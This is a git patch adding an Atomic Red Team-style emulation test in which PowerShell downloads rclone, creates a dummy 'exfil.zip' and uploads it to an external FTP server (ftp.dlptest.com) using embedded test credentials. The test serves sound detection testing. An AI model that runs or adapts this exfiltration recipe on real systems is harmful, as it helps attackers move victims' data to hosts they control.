From a69e08e6ae1eaaccd50f72fb0fadd51aed1f49c9 Mon Sep 17 00:00:00 2001
From: BlueTeamOps <1480956+blueteam0ps@users.noreply.github.com>
Date: Tue, 1 Nov 2022 05:58:24 +1100
Subject: [PATCH] Updated T1048.003 to include Rclone (#2202)

* Updated T1048.003 to include Rclone

Added the use of Rclone to exfiltrate data to an external FTP server.

* Updated the test as discussed.

* Fixed the typo

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1048.003/T1048.003.yaml | 46 ++++++++++++++++++++++++++++++++
 1 file changed, 46 insertions(+)

diff --git a/atomics/T1048.003/T1048.003.yaml b/atomics/T1048.003/T1048.003.yaml
index ddad909c..d0b3b12f 100644
--- a/atomics/T1048.003/T1048.003.yaml
+++ b/atomics/T1048.003/T1048.003.yaml
@@ -159,3 +159,49 @@ atomic_tests:
       $ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
       $ftp_del.GetResponse()}} catch{}
     name: powershell
+- name: Exfiltration Over Alternative Protocol - FTP - Rclone
+  auto_generated_guid: b854eb97-bf9b-45ab-a1b5-b94e4880c56b
+  description: |-
+    Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server.
+    [Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
+  supported_platforms:
+  - windows
+  input_arguments:
+    ftp_server:
+      description: Your own ftp server
+      type: string
+      default: ftp.dlptest.com
+    ftp_pass:
+      description: Your FTP user's password
+      type: string
+      default: rNrKYTX9g7z3RgJRmxWuGHbeu
+    ftp_user:
+      description: Your FTP username
+      type: string
+      default: dlpuser
+    ftp_port:
+      description: Your FTP's port
+      type: string
+      default: 21
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Check if the exfil package exists
+    prereq_command: |
+      if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1}
+    get_prereq_command: | 
+      fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760
+  - description: 'Check if rclone zip exists'
+    prereq_command: | 
+      if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
+      Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\
+  executor:
+    command: |-
+      $rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
+      $exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
+      &$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
+      &$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
+    name: powershell
+    elevation_required: true